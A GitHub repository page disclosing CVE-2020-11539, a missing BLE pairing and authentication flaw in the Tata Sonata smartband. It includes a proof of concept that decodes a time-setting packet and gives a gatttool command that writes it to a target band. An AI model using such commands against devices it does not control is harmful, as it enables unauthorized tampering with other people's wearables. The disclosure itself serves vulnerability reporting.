Skip to content

the-girl-who-lived/CVE-2020-11539

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 

CVE-2020-11539: Improper Access Control in Tata Sonata Smartband

Information

Description: It has been identified that the smart band has no pairing (mode 0 BLE security level) The data being transmitted over the air is not encrypted. Adding to this, the data being sent to the smart band doesn't have any authentication or signature verification makes any attacker to control the parameter of the smart device.

Versions Affected: Smart SF Rush - 1.12

Researcher: Sayli Ambure (https://twitter.com/sayli_ambure)

MITRE CVE link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539

Proof-of-Concept Exploit

Description

The following packet is reversed and found to be for changing the time, more packets can be reversed by extracting hcisnoop dump from your phone.

  1. Data value: 00870e00141401060712052b051e

    Data Hexdump: 00 87 0e 00 14 14 01 06 07 12 05 2b 05 1e
    Data Decimal: 00 135 14 00 20 20 01 06 07 18 05 43 05 30
  • 00 87: Header of the packet

  • 0e 00: Type of the pacekt

  • 14 14: Year in hex (2020)

  • 01 06: Month and Day ( Jan 6th)

  • 07 12: Hour and Minute in hex ( 07:18AM)

  • 05 : Seconds

  1. Send following Gatttool command for controlling the time of the smartband:

gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e

Proof of Concept Video:

About

Improper Access Control in Tata Sonata Smartband

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published